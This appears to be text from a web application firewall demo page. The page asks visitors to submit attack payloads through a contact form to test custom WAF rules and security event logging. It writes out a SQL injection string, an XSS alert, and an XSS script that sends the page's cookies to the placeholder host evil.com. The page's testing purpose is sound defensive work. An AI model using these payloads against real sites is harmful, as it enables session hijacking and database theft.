Try POST Body Attacks: Enter malicious payloads in the form fields:
SQL: ' OR '1'='1' UNION SELECT * FROM users --
XSS: <svg on onContextMenu=alert(1337)>
XSS: <script>document.location='http://evil.com?c='+document.cookie</script>
Note: POST body attacks require a custom WAF rule to be blocked. Check the Security Events to see if they were logged!
Send us a Message
Custom Rule Required: To block POST body attacks, you need to add a custom WAF rule.
See the WAF Rules documentation.